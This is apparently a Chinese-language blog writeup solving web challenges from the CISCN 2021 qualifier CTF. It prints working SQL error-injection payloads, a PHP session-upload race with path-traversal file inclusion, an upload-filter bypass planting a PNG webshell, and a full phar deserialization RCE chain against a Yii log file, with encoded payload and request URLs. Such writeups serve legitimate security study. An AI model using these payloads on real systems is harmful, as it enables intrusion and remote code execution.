0%

CISCN2021初赛 Web Writeup

Posted on Valine: 12k 15 mins.

easy_sql

报错注入,盲猜flag表,但不知道名称,用重复column名爆列名

参考:无列名注入小记

1
uname=%27)/**/||/**/(select/**/1/**/from/**/flag/**/where(select/**/*/**/from(select/**/*/**/from/**/flag/**/as a/**/join/**/flag/**/as/**/b/**/using(id,no))as/**/c))/**/or/**/('1&passwd=1&Submit=%E7%99%BB%E5%BD%95

image-20210518133713042

1
2
3
uname=%27)/**/and/**/extractvalue(1,concat(0x7e,(select/**/substr(`e691d77e-5da1-409b-a37b-ff4edfa14123`,31)/**/from/**/flag),0x7e))/**/and/**/('0&passwd=1&Submit=%E7%99%BB%E5%BD%95

uname=%27)/**/and/**/extractvalue(1,concat(0x7e,(select/**/substr(`e691d77e-5da1-409b-a37b-ff4edfa14123`)/**/from/**/flag),0x7e))/**/and/**/('0&passwd=1&Submit=%E7%99%BB%E5%BD%95

读出flag CISCN{9fO5F-WC2YL-GY3zM-R4aIu-kAjxU-}

easy_source

原题:https://r0yanx.com/2020/10/28/fslh-writeup/

middle_source

扫出来一个phpinfo 页面

image-20210518134150949

根据phpinfo ,猜测可能是 session 包含,因此启动两个线程,一个包含 php 内容,一个访问包含,就 var_dump /etc 了好几次有点难受

session_upload_process

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
POST /index.php HTTP/1.1
Host: 124.71.229.172:21940
User-Agent: python-requests/2.25.1
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Cookie: PHPSESSID=star1
Content-Length: 1343
Content-Type: multipart/form-data; boundary=a052c080752fddf220113461b22d48a7

--a052c080752fddf220113461b22d48a7
Content-Disposition: form-data; name="PHP_SESSION_UPLOAD_PROGRESS"

<?php 
$root='/etc/fhfeeeaagb/badidicfgc/eabdhbdgeb/babgfddbff';
$filenames=scandir($root);
while(is_dir($filenames[2])){
	$root=$root.'/'.$filenames[2];
	$filenames=scandir($root);
}
var_dump($root.'/'.$filenames[2]);
var_dump(file_get_contents($root.'/'.$filenames[2]));
?>
--a052c080752fddf220113461b22d48a7
Content-Disposition: form-data; name="file"; filename="1.txt"
a*100000
1
2
3
4
5
6
7
8
9
10
11
POST /index.php HTTP/1.1
Host: 124.71.229.172:21940
User-Agent: python-requests/2.25.1
Accept-Encoding: gzip, deflate
Accept: */*
Cookie: PHPSESSID=star1
Connection: close
Content-Length: 124
Content-Type: application/x-www-form-urlencoded

cf=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fvar%2Flib%2Fphp%2Fsessions%2Fcafdcffacd%2Fsess_star1

两个包放在repeater 里面 30 线程跑,不断看结果,改目录。
最后目录在/etc/fhfeeeaagb/badidicfgc/eabdhbdgeb/babgfddbff/fbhbiaihha/fl444444g直接包含
CISCN{lxs4A5ku06-ywSkx-iasCN-9AMPN-}

upload

index.php

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
<?php
if (!isset($_GET["ctf"])) {
    highlight_file(__FILE__);
    die();
}

if(isset($_GET["ctf"]))
    $ctf = $_GET["ctf"];

if($ctf=="upload") {
    if ($_FILES['postedFile']['size'] > 1024*512) {
        die("这么大个的东西你是想d我吗?");
    }
    $imageinfo = getimagesize($_FILES['postedFile']['tmp_name']);
    if ($imageinfo === FALSE) {
        die("如果不能好好传图片的话就还是不要来打扰我了");
    }
    if ($imageinfo[0] !== 1 && $imageinfo[1] !== 1) {
        die("东西不能方方正正的话就很讨厌");
    }
    $fileName=urldecode($_FILES['postedFile']['name']);
    if(stristr($fileName,"c") || stristr($fileName,"i") || stristr($fileName,"h") || stristr($fileName,"ph")) {
        die("有些东西让你传上去的话那可不得了");
    }
    $imagePath = "image/" . mb_strtolower($fileName);
    if(move_uploaded_file($_FILES["postedFile"]["tmp_name"], $imagePath)) {
        echo "upload success, image at $imagePath";
    } else {
        die("传都没有传上去");
    }
}

getimagesize判断是否图片,要求图片宽和高为1,同时要求后缀不能有cihph,那么上传php和.htaccess就不行了

example.php

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
<?php
if (!isset($_GET["ctf"])) {
    highlight_file(__FILE__);
    die();
}

if(isset($_GET["ctf"]))
    $ctf = $_GET["ctf"];

if($ctf=="poc") {
    $zip = new \ZipArchive();
    $name_for_zip = "example/" . $_POST["file"];
    if(explode(".",$name_for_zip)[count(explode(".",$name_for_zip))-1]!=="zip") {
        die("要不咱们再看看?");
    }
    if ($zip->open($name_for_zip) !== TRUE) {
        die ("都不能解压呢");
    }

    echo "可以解压,我想想存哪里";
    $pos_for_zip = "/tmp/example/" . md5($_SERVER["REMOTE_ADDR"]);
    $zip->extractTo($pos_for_zip);
    $zip->close();
    unlink($name_for_zip);
    $files = glob("$pos_for_zip/*");
    foreach($files as $file){
        if (is_dir($file)) {
            continue;
        }
        $first = imagecreatefrompng($file);
        $size = min(imagesx($first), imagesy($first));
        $second = imagecrop($first, ['x' => 0, 'y' => 0, 'width' => $size, 'height' => $size]);
        if ($second !== FALSE) {
            $final_name = pathinfo($file)["basename"];
            imagepng($second, 'example/'.$final_name);
            imagedestroy($second);
        }
        imagedestroy($first);
        unlink($file);
    }

}

从压缩包解压,并对图片重新裁剪

这里有一个trick,mb_strtolower处理某些unicode字符时会有问题

1
2
var_dump(mb_strtolower('İ')==='i');
//true

这里stristr判断黑名单后又用mb_strtolower处理,且有二次urldecode,那么思路就很明显了,上传zip压缩包文件,然后解压getshell

常规图片马都是在末尾添加php代码,但是这里解压过后会对图片进行裁剪,导致php代码丢失,所以这里采用写入到图片数据里,即IDAT块

用这个工具生成图片马

https://github.com/huntergregal/PNG-IDAT-Payload-Generator/

更改后缀为php,然后打包进zip压缩包

这里又有一个trick,可以用下面内容绕过getimagesize

1
2
#define width 1
#define height 1

百度了一下大概是xmb图片定义宽高的方法,可以在文件任何位置,但是必须在一行的开头(即前面必须有%0d%0a)

image-20210519190247440

成功上传

image-20210519190443012

解压

image-20210519190614470

访问getshell

同时这里记录一个坑点,我之前调试的时候使用的是2020.1版本的burpsuite,但是上传文件之后总发现文件内容被更改了,后来才发现paste from file的时候burp把一些十六进制字符比如8D直接就转换成了3F,emmm……后来换成最新版burp就没问题了,还是应该及时更新

filter

首先搭建一个yii环境

1
composer create-project --prefer-dist yiisoft/yii2-app-basic my-yii

加上提示配置

1
2
3
4
5
6
7
8
9
10
'log' => [
    'traceLevel' => YII_DEBUG ? 0 : 0,
    'targets' => [
        [
            'class' => 'yii\log\FileTarget',
            'levels' => ['error'],
            'logVars' => [],
        ],
    ],
],

发现 /runtime/logs/app.log日志文件,和Laravel的差不多

题目附件里改动就这一个路由,读取文件再写入,那么整体思路应该和Laravel Debug RCE差不多,清空log文件,写入phar,然后再phar反序列化

image-20210520094545426

可以参考:https://www.anquanke.com/post/id/231459

composer.json存在拓展monolog,phpggc刚好在版本范围内

image-20210520095352214

生成payload

1
./phpggc monolog/rce2 phpinfo 1 --phar phar -o php://output | base64 -w0 | python -c "import sys;print(''.join(['=' + hex(ord(i))[2:].zfill(2) + '=00' for i in sys.stdin.read()]).upper())" > payload.txt

清空日志文件

1
http://dd60ec6c-4197-4c9b-8dd0-8651a607fa70.node3.buuoj.cn/?file=php://filter/read=consumed/resource=../runtime/logs/app.log

写入payload,注意最后面有一个a(这是为了能完整地将payload解码出来)

1
http://dd60ec6c-4197-4c9b-8dd0-8651a607fa70.node3.buuoj.cn/?file==50=00=44=00=39=00=77=00=61=00=48=00=41=00=67=00=58=00=31=00=39=00=49=00=51=00=55=00=78=00=55=00=58=00=30=00=4E=00=50=00=54=00=56=00=42=00=4A=00=54=00=45=00=56=00=53=00=4B=00=43=00=6B=00=37=00=49=00=44=00=38=00=2B=00=44=00=51=00=71=00=36=00=41=00=67=00=41=00=41=00=41=00=67=00=41=00=41=00=41=00=42=00=45=00=41=00=41=00=41=00=41=00=42=00=41=00=41=00=41=00=41=00=41=00=41=00=42=00=6A=00=41=00=67=00=41=00=41=00=54=00=7A=00=6F=00=7A=00=4D=00=6A=00=6F=00=69=00=54=00=57=00=39=00=75=00=62=00=32=00=78=00=76=00=5A=00=31=00=78=00=49=00=59=00=57=00=35=00=6B=00=62=00=47=00=56=00=79=00=58=00=46=00=4E=00=35=00=63=00=32=00=78=00=76=00=5A=00=31=00=56=00=6B=00=63=00=45=00=68=00=68=00=62=00=6D=00=52=00=73=00=5A=00=58=00=49=00=69=00=4F=00=6A=00=45=00=36=00=65=00=33=00=4D=00=36=00=4E=00=6A=00=6F=00=69=00=63=00=32=00=39=00=6A=00=61=00=32=00=56=00=30=00=49=00=6A=00=74=00=50=00=4F=00=6A=00=49=00=35=00=4F=00=69=00=4A=00=4E=00=62=00=32=00=35=00=76=00=62=00=47=00=39=00=6E=00=58=00=45=00=68=00=68=00=62=00=6D=00=52=00=73=00=5A=00=58=00=4A=00=63=00=51=00=6E=00=56=00=6D=00=5A=00=6D=00=56=00=79=00=53=00=47=00=46=00=75=00=5A=00=47=00=78=00=6C=00=63=00=69=00=49=00=36=00=4E=00=7A=00=70=00=37=00=63=00=7A=00=6F=00=78=00=4D=00=44=00=6F=00=69=00=41=00=43=00=6F=00=41=00=61=00=47=00=46=00=75=00=5A=00=47=00=78=00=6C=00=63=00=69=00=49=00=37=00=54=00=7A=00=6F=00=79=00=4F=00=54=00=6F=00=69=00=54=00=57=00=39=00=75=00=62=00=32=00=78=00=76=00=5A=00=31=00=78=00=49=00=59=00=57=00=35=00=6B=00=62=00=47=00=56=00=79=00=58=00=45=00=4A=00=31=00=5A=00=6D=00=5A=00=6C=00=63=00=6B=00=68=00=68=00=62=00=6D=00=52=00=73=00=5A=00=58=00=49=00=69=00=4F=00=6A=00=63=00=36=00=65=00=33=00=4D=00=36=00=4D=00=54=00=41=00=36=00=49=00=67=00=41=00=71=00=41=00=47=00=68=00=68=00=62=00=6D=00=52=00=73=00=5A=00=58=00=49=00=69=00=4F=00=30=00=34=00=37=00=63=00=7A=00=6F=00=78=00=4D=00=7A=00=6F=00=69=00=41=00=43=00=6F=00=41=00=59=00=6E=00=56=00=6D=00=5A=00=6D=00=56=00=79=00=55=00=32=00=6C=00=36=00=5A=00=53=00=49=00=37=00=61=00=54=00=6F=00=74=00=4D=00=54=00=74=00=7A=00=4F=00=6A=00=6B=00=36=00=49=00=67=00=41=00=71=00=41=00=47=00=4A=00=31=00=5A=00=6D=00=5A=00=6C=00=63=00=69=00=49=00=37=00=59=00=54=00=6F=00=78=00=4F=00=6E=00=74=00=70=00=4F=00=6A=00=41=00=37=00=59=00=54=00=6F=00=79=00=4F=00=6E=00=74=00=70=00=4F=00=6A=00=41=00=37=00=63=00=7A=00=6F=00=78=00=4F=00=69=00=49=00=78=00=49=00=6A=00=74=00=7A=00=4F=00=6A=00=55=00=36=00=49=00=6D=00=78=00=6C=00=64=00=6D=00=56=00=73=00=49=00=6A=00=74=00=4F=00=4F=00=33=00=31=00=39=00=63=00=7A=00=6F=00=34=00=4F=00=69=00=49=00=41=00=4B=00=67=00=42=00=73=00=5A=00=58=00=5A=00=6C=00=62=00=43=00=49=00=37=00=54=00=6A=00=74=00=7A=00=4F=00=6A=00=45=00=30=00=4F=00=69=00=49=00=41=00=4B=00=67=00=42=00=70=00=62=00=6D=00=6C=00=30=00=61=00=57=00=46=00=73=00=61=00=58=00=70=00=6C=00=5A=00=43=00=49=00=37=00=59=00=6A=00=6F=00=78=00=4F=00=33=00=4D=00=36=00=4D=00=54=00=51=00=36=00=49=00=67=00=41=00=71=00=41=00=47=00=4A=00=31=00=5A=00=6D=00=5A=00=6C=00=63=00=6B=00=78=00=70=00=62=00=57=00=6C=00=30=00=49=00=6A=00=74=00=70=00=4F=00=69=00=30=00=78=00=4F=00=33=00=4D=00=36=00=4D=00=54=00=4D=00=36=00=49=00=67=00=41=00=71=00=41=00=48=00=42=00=79=00=62=00=32=00=4E=00=6C=00=63=00=33=00=4E=00=76=00=63=00=6E=00=4D=00=69=00=4F=00=32=00=45=00=36=00=4D=00=6A=00=70=00=37=00=61=00=54=00=6F=00=77=00=4F=00=33=00=4D=00=36=00=4E=00=7A=00=6F=00=69=00=59=00=33=00=56=00=79=00=63=00=6D=00=56=00=75=00=64=00=43=00=49=00=37=00=61=00=54=00=6F=00=78=00=4F=00=33=00=4D=00=36=00=4E=00=7A=00=6F=00=69=00=63=00=47=00=68=00=77=00=61=00=57=00=35=00=6D=00=62=00=79=00=49=00=37=00=66=00=58=00=31=00=7A=00=4F=00=6A=00=45=00=7A=00=4F=00=69=00=49=00=41=00=4B=00=67=00=42=00=69=00=64=00=57=00=5A=00=6D=00=5A=00=58=00=4A=00=54=00=61=00=58=00=70=00=6C=00=49=00=6A=00=74=00=70=00=4F=00=69=00=30=00=78=00=4F=00=33=00=4D=00=36=00=4F=00=54=00=6F=00=69=00=41=00=43=00=6F=00=41=00=59=00=6E=00=56=00=6D=00=5A=00=6D=00=56=00=79=00=49=00=6A=00=74=00=68=00=4F=00=6A=00=45=00=36=00=65=00=32=00=6B=00=36=00=4D=00=44=00=74=00=68=00=4F=00=6A=00=49=00=36=00=65=00=32=00=6B=00=36=00=4D=00=44=00=74=00=7A=00=4F=00=6A=00=45=00=36=00=49=00=6A=00=45=00=69=00=4F=00=33=00=4D=00=36=00=4E=00=54=00=6F=00=69=00=62=00=47=00=56=00=32=00=5A=00=57=00=77=00=69=00=4F=00=30=00=34=00=37=00=66=00=58=00=31=00=7A=00=4F=00=6A=00=67=00=36=00=49=00=67=00=41=00=71=00=41=00=47=00=78=00=6C=00=64=00=6D=00=56=00=73=00=49=00=6A=00=74=00=4F=00=4F=00=33=00=4D=00=36=00=4D=00=54=00=51=00=36=00=49=00=67=00=41=00=71=00=41=00=47=00=6C=00=75=00=61=00=58=00=52=00=70=00=59=00=57=00=78=00=70=00=65=00=6D=00=56=00=6B=00=49=00=6A=00=74=00=69=00=4F=00=6A=00=45=00=37=00=63=00=7A=00=6F=00=78=00=4E=00=44=00=6F=00=69=00=41=00=43=00=6F=00=41=00=59=00=6E=00=56=00=6D=00=5A=00=6D=00=56=00=79=00=54=00=47=00=6C=00=74=00=61=00=58=00=51=00=69=00=4F=00=32=00=6B=00=36=00=4C=00=54=00=45=00=37=00=63=00=7A=00=6F=00=78=00=4D=00=7A=00=6F=00=69=00=41=00=43=00=6F=00=41=00=63=00=48=00=4A=00=76=00=59=00=32=00=56=00=7A=00=63=00=32=00=39=00=79=00=63=00=79=00=49=00=37=00=59=00=54=00=6F=00=79=00=4F=00=6E=00=74=00=70=00=4F=00=6A=00=41=00=37=00=63=00=7A=00=6F=00=33=00=4F=00=69=00=4A=00=6A=00=64=00=58=00=4A=00=79=00=5A=00=57=00=35=00=30=00=49=00=6A=00=74=00=70=00=4F=00=6A=00=45=00=37=00=63=00=7A=00=6F=00=33=00=4F=00=69=00=4A=00=77=00=61=00=48=00=42=00=70=00=62=00=6D=00=5A=00=76=00=49=00=6A=00=74=00=39=00=66=00=58=00=30=00=46=00=41=00=41=00=41=00=41=00=5A=00=48=00=56=00=74=00=62=00=58=00=6B=00=45=00=41=00=41=00=41=00=41=00=48=00=73=00=4B=00=6C=00=59=00=41=00=51=00=41=00=41=00=41=00=41=00=4D=00=66=00=6E=00=2F=00=59=00=74=00=67=00=45=00=41=00=41=00=41=00=41=00=41=00=41=00=41=00=41=00=49=00=41=00=41=00=41=00=41=00=64=00=47=00=56=00=7A=00=64=00=43=00=35=00=30=00=65=00=48=00=51=00=45=00=41=00=41=00=41=00=41=00=48=00=73=00=4B=00=6C=00=59=00=41=00=51=00=41=00=41=00=41=00=41=00=4D=00=66=00=6E=00=2F=00=59=00=74=00=67=00=45=00=41=00=41=00=41=00=41=00=41=00=41=00=41=00=42=00=30=00=5A=00=58=00=4E=00=30=00=64=00=47=00=56=00=7A=00=64=00=47=00=54=00=77=00=30=00=7A=00=65=00=63=00=42=00=6C=00=74=00=50=00=57=00=55=00=65=00=6C=00=4F=00=6D=00=6D=00=48=00=30=00=33=00=4C=00=4B=00=4F=00=2B=00=71=00=61=00=41=00=67=00=41=00=41=00=41=00=45=00=64=00=43=00=54=00=55=00=49=00=3D=00a

清除其他字符

1
http://dd60ec6c-4197-4c9b-8dd0-8651a607fa70.node3.buuoj.cn/?file=php://filter/write=convert.quoted-printable-decode|convert.iconv.utf-16le.utf-8|convert.base64-decode/resource=../runtime/logs/app.log

phar序列化

1
http://dd60ec6c-4197-4c9b-8dd0-8651a607fa70.node3.buuoj.cn/?file=phar://../runtime/logs/app.log

image-20210520143635914

和Laravel Debug RCE的区别?

日志中只出现一次完整payload,还有一次到15字符省略的payload

image-20210520143950955

因为在utf-16le->utf-8的时候必须要求是偶数字节,不然会报错,所以在Laravel Debug RCE的时候会先发送一个AA的文件名让日志必定为偶数字节

在yii这里测试的时候本身就是偶字节的原因,就不需要提前发了,但是在调试Laravel的时候需要注意

参考链接

http://w4nder.top/?p=451